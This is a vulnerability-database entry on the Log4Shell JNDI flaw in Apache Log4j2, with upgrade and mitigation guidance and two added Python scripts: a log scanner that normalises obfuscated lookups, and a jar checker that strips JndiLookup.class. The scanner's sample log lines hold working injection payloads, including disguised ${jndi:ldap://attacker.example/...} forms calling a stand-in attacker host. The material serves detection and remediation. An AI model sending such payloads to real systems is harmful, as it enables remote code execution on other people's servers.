Apache Log4j2 JNDI Remote Code Execution (delayed) - Vulnerability Database

Description

Apache Log4j2 versions 2.0-beta9 through 2.14.1 (CVE-2021-44228, widely known as Log4Shell) contain a critical remote code execution vulnerability in the JNDI (Java Naming and Directory Interface) lookup feature. In these versions message lookup substitution is enabled by default, so the library expands ${...} lookup expressions that appear anywhere in the text of a log message. An attacker who can get a JNDI reference such as ${jndi:ldap://attacker-host/a} into any data the application logs (an HTTP header, a URL parameter, a username, a form field) causes the logging call itself to connect to the attacker-controlled LDAP or RMI server; the server replies with a reference to a remote class or with a serialized Java object, and the application ends up executing attacker-supplied code. The vulnerability is particularly dangerous because logging user-controlled input is common practice, so many applications are exploitable without any obvious flaw in their own code, and the payload can be carried through intermediate systems before it reaches a component that logs it.
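The following Python example is added here to make the lookup mechanism concrete; it is not code from the original page or from the Log4j project. It emulates the inside-out resolution of nested lookups that Log4j's StrSubstitutor performs, restricted to the lower:, upper: and :-default forms attackers use to disguise the string jndi:, and then reports any jndi lookup left standing, which is the check a detection engineer wants to run over request logs or WAF samples. The sample log lines are constructed for the example, and the evaluate_lookup function is an assumption about the subset of Log4j's behaviour that matters for detection rather than a reimplementation of the library.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...}: a lookup whose body contains no further '$', '{' or '}'.
# Log4j's StrSubstitutor resolves nested lookups inside-out, so the emulation
# repeatedly resolves the innermost expression first.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}]*)\}", re.IGNORECASE)
FROZEN_OPEN, FROZEN_CLOSE = "\x01", "\x02"   # stand-ins for '${' and '}' of lookups kept verbatim


def evaluate_lookup(var_expr: str) -> Optional[str]:
    """Emulate the subset of Log4j 2 lookup behaviour attackers use to disguise 'jndi:'.

    Assumption made for this example: only lower:, upper: and the ':-default' fallback
    are modelled; every other lookup (env:, sys:, date:, an empty name as in ${::-j}, ...)
    is treated as unresolvable, so the attacker-supplied default, the only value an
    attacker can count on, is what survives. Returns None when the lookup must be kept
    verbatim (a jndi lookup, or an unknown lookup without a default).
    """
    var_name, default = var_expr, None
    if ":-" in var_expr:                       # ${name:-default}
        var_name, default = var_expr.split(":-", 1)
    prefix, _, key = var_name.partition(":")   # Log4j splits on the first ':'
    prefix = prefix.lower()                    # lookup names are case-insensitive
    if prefix == "jndi":
        return None
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return default


def normalize(message: str, max_rounds: int = 200) -> str:
    """Resolve disguising lookups until any jndi lookup appears in plain form."""
    for _ in range(max_rounds):
        match = INNERMOST.search(message)
        if match is None:
            break
        value = evaluate_lookup(match.group(1))
        if value is None:
            # Freeze the lookup so the next round does not match it again.
            value = FROZEN_OPEN + match.group(1) + FROZEN_CLOSE
        message = message[:match.start()] + value + message[match.end():]
    return message.replace(FROZEN_OPEN, "${").replace(FROZEN_CLOSE, "}")


def find_jndi_lookups(message: str) -> List[str]:
    """Return the JNDI name (e.g. 'ldap://host/x') of every jndi lookup in the message."""
    return [m.group(1) for m in JNDI_LOOKUP.finditer(normalize(message))]


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """1-based line numbers and JNDI names for every line carrying a jndi lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = find_jndi_lookups(line)
        if names:
            hits.append((number, names))
    return hits


# Constructed sample lines: a plain payload, three disguised payloads, two benign lines.
SAMPLE_LOG = [
    'GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1',
    'User-Agent: ${${lower:J}ndi:${lower:L}${lower:D}a${lower:P}://attacker.example/a}',
    'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/b}',
    'Referer: ${${env:NOTSET:-j}ndi:dns://attacker.example/c}',
    'User-Agent: Mozilla/5.0 (compatible; price is ${amount})',
    'GET /report?fmt=${date:yyyy-MM-dd} HTTP/1.1',
]

if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (number, ", ".join(names)))
```

A plain substring match on "jndi:" misses lines 2 to 4 of the sample; resolving the lookups first is what makes the signature robust, and the same normalization can be applied to HTTP headers at a proxy or to data already sitting in a SIEM.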

Remediation

Immediately upgrade to Apache Log4j2 version 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6). Lookups inside log messages were removed entirely in 2.16.0 (2.12.2 and 2.3.1 on the older branches), JNDI functionality is disabled by default and must be explicitly enabled, and the later releases close the follow-on issues found after the initial fix (CVE-2021-45046 in 2.16.0, CVE-2021-45105 in 2.17.0, CVE-2021-44832 in 2.17.1).

For systems that cannot be upgraded immediately, apply one of these mitigations, in order of preference, and restart the application:

1. Remove the JndiLookup class from every copy of log4j-core on the classpath (works for all 2.x versions and is the mitigation the Log4j project recommends when upgrading is not possible):
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Set the system property (Log4j 2.10.0 through 2.14.1 only):

-Dlog4j2.formatMsgNoLookups=true

3. Set the environment variable (Log4j 2.10.0 through 2.14.1 only):
LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Options 2 and 3 disable lookups in the message text only: they do nothing on releases before 2.10.0, and they do not stop attacker-controlled data from reaching a JNDI lookup by other routes, such as Thread Context Map values referenced from a non-default pattern layout. log4j-core is frequently bundled inside WAR, EAR, shaded or fat jars, so the class removal (or the upgrade) has to be applied to each embedded copy as well.


Note: Log4j 2.15.0 is insufficient. It disables message lookups by default and restricts JNDI to localhost, but CVE-2021-45046 showed that attacker-controlled data can still reach JNDI through context lookups in non-default pattern layouts, which allowed information leakage and, in some environments, remote code execution. Newer JVMs raise the bar but do not close the hole: Java 8u121 set com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false, and 8u191 did the same for com.sun.jndi.ldap.object.trustURLCodebase, so the JVM no longer loads classes from a remote codebase named by the attacker's server. The attacker's LDAP server can instead return a serialized Java object that the application deserializes, so exploitation remains possible wherever a suitable gadget class is present on the classpath; upgrading Log4j is still required. Verify all dependencies and transitive dependencies for vulnerable Log4j versions using software composition analysis tools, and also inspect deployed application archives directly, since a copy of log4j-core shaded into a fat jar does not appear in a build tool's dependency report.
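This added Python example (mine, not the vendor's or the Log4j project's code) performs the two checks a practitioner wants after applying the mitigations above: it reads Implementation-Version from a jar's manifest (falling back to the conventional file name), decides whether that version falls in the affected range, reports whether JndiLookup.class is still present, and writes a copy of the jar with the class removed, which is the zip -d step from the mitigation list done with Python's zipfile module. The build_demo_jar function creates a constructed stand-in for log4j-core so the example runs offline; it contains no real Log4j code, and the version ranges encoded in is_vulnerable_version and is_fully_patched are the ones named in the remediation text.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
VERSION_IN_MANIFEST = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)
VERSION_IN_FILENAME = re.compile(r"log4j-core-(\d[\w.-]*)\.jar$")


def parse_version(text: Optional[str]) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Pre-release tags are dropped,
    which errs on the side of caution (every 2.0 beta is treated like 2.0)."""
    match = re.match(r"\d+(?:\.\d+)*", text or "")
    return tuple(int(p) for p in match.group(0).split(".")) if match else ()


def _pad(version: Tuple[int, ...]) -> Tuple[int, ...]:
    return version + (0,) * (3 - len(version))


def is_vulnerable_version(version: Tuple[int, ...]) -> bool:
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1; the backported
    fixes 2.12.2+ (Java 7) and 2.3.1+ (Java 6) are not affected."""
    if len(version) < 2 or version[0] != 2:
        return False
    v = _pad(version)
    if (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return False
    return v < (2, 15, 0)


def is_fully_patched(version: Tuple[int, ...]) -> bool:
    """2.17.1+, 2.12.4+ (Java 7) or 2.3.2+ (Java 6): the releases the remediation names."""
    if len(version) < 2 or version[0] != 2:
        return False
    v = _pad(version)
    return v >= (2, 17, 1) or (2, 12, 4) <= v < (2, 13, 0) or (2, 3, 2) <= v < (2, 4, 0)


def inspect_jar(path: str) -> Dict[str, object]:
    """Report version, presence of JndiLookup.class and the resulting exposure of one jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if MANIFEST in names:
            found = VERSION_IN_MANIFEST.search(jar.read(MANIFEST).decode("utf-8", "replace"))
            version = found.group(1) if found else None
        if version is None:   # fall back to the conventional file name
            found = VERSION_IN_FILENAME.search(os.path.basename(path))
            version = found.group(1) if found else None
        parsed = parse_version(version)
        has_class = JNDI_LOOKUP_CLASS in names
        return {
            "version": version,
            "has_jndi_lookup": has_class,
            # CVE-2021-44228 needs both: the class on the classpath and an affected release.
            "vulnerable": has_class and is_vulnerable_version(parsed),
            "fully_patched": is_fully_patched(parsed),
        }


def strip_jndi_lookup(src: str, dst: str) -> bool:
    """Write a copy of src without JndiLookup.class (what 'zip -q -d' does in place).
    Returns True if the class was present and removed."""
    removed = False
    with zipfile.ZipFile(src) as in_jar, zipfile.ZipFile(dst, "w") as out_jar:
        for info in in_jar.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            out_jar.writestr(info, in_jar.read(info.filename))
    return removed


def build_demo_jar(path: str, version: str) -> str:
    """Constructed stand-in for log4j-core-<version>.jar: a manifest plus an empty
    JndiLookup.class entry, enough to exercise the checks above. Not a real jar."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr(MANIFEST, "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return path


def demo(version: str = "2.14.1") -> Tuple[Dict[str, object], Dict[str, object]]:
    """Round trip: build a demo jar, inspect it, strip the class, inspect the copy."""
    work = tempfile.mkdtemp()
    src = build_demo_jar(os.path.join(work, "log4j-core-%s.jar" % version), version)
    dst = os.path.join(work, "log4j-core-%s-nojndi.jar" % version)
    strip_jndi_lookup(src, dst)
    return inspect_jar(src), inspect_jar(dst)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

Run inspect_jar over every jar found by walking the deployment directory, and unpack WAR, EAR and fat jars first, because the nested copies are the ones a build-tool report misses; after stripping the class, the report still shows fully_patched as False, which is the reminder that class removal is a stopgap until the upgrade lands.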
